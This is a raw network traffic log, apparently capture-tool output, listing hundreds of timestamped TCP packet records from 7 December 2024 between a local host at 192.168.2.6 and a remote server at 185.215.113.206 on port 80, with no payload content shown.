Dec 7, 2024 10:51:48.269706964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.269782066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.269920111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.270618916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.270693064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.270723104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.270765066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.271624088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.271668911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.271795034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.271842003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.272614956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.272664070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.272736073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.272780895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.273660898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.273710966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.273751974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.274599075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.274648905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.274702072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.275079012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.275568962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.275625944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.275713921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.275785923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.276613951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.276683092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.276762962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.276803017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.277517080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.277569056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.277596951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.277635098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.278520107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.278569937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.278615952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.278649092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.279508114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.279597044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.279620886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.279670954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.280504942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.280549049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.280627966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.280723095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.281522036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.281568050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.281609058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.281651020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.282480001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.282569885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.282610893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.282651901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.283447027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.283488035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.283562899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.283713102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.284451962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.284506083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.284559965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.284653902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.285430908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.285481930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.285545111 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.285706043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.286422014 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.286473989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.286519051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.286560059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.287425041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.287480116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.287522078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.287637949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.288424015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.288500071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.288563967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.289484024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.289550066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.289599895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.289638042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.290390015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.290430069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.290446997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.290477991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.291383028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.291431904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.291485071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.291868925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.292355061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.292407990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.292484999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.292521954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.293375015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.293473959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.293531895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.294332981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.294401884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.294431925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.294466972 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.295298100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.295370102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.373897076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.373914003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.373975992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.374083042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.374083042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.374089956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.374135017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.374973059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.375045061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.375058889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.375094891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.375931025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.375992060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.436506033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.436561108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.436630011 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.436672926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.436783075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.436845064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.436925888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.436974049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.437709093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.437772036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.437798977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.437839031 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.438752890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.438805103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.438855886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.438894033 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.439673901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.439768076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.439831018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.440660000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.440727949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.440762043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.440809965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.441654921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.441696882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.441740990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.441787004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.442703009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.442738056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.442744970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.442778111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.443655968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.443711996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.443746090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.443788052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.444634914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.444699049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.444772005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.444890022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.445578098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.445646048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.445755959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.445799112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.446609974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.446666956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.446700096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.446736097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.447609901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.447683096 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.447712898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.447757006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.448576927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.448633909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.448685884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.448729038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.449598074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.449668884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.449691057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.449727058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.450562954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.450630903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.450690031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.450733900 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.451551914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.451628923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.451694965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.451735020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.452532053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.452598095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.452639103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.452687979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.453510046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.453573942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.453614950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.453653097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.454507113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.454566002 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.454611063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.454653978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.455497980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.455560923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.455640078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.455735922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.456518888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.456578016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.456679106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.456784964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.457488060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.457550049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.457588911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.457626104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.458511114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.458554983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.458597898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.458801031 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.459458113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.459518909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.459608078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.459657907 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.460458040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.460571051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.460596085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.460623026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.461513996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.461569071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.461637974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.461700916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.462424040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.462464094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.462524891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.462558031 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.463562012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.463604927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.463617086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.463651896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.464387894 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.464453936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.464490891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.464524031 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.465388060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.465439081 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.465493917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.465528965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.466360092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.466417074 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.466465950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.466500998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.467355013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.467442989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.467457056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.467499018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.468362093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.468421936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.468481064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.469343901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.469384909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.469443083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.469526052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.470345020 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.470410109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.470438004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.470473051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.471347094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.471386909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.471446991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.471484900 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.472341061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.472352982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.472383022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.472407103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.473373890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.473440886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.473444939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.473481894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.474267006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.474311113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.474428892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.474469900 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.475263119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.475306988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.475368023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.475433111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.476650953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.476759911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.476785898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.476804018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.477252007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.477349043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.477359056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.477415085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.478255987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.478301048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.478318930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.478353024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.479245901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.479350090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.479372025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.479417086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.480257034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.480299950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.480381012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.480415106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.481225014 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.481326103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.481384039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.481445074 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.482218027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.482263088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.482316017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.482408047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.483182907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.483259916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.483295918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.483338118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.484174013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.484221935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.484271049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.484302998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.485205889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.485251904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.485286951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.485320091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.486183882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.486223936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.486291885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.486339092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.487138033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.487176895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.487294912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.487552881 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.565536976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.565608978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.565644026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.565690994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.566039085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.566085100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.566118956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.566168070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.567176104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.567224026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.567271948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.567328930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.567886114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.568048954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.628423929 CET	80	49808	185.215.113.206	192.168.2.6
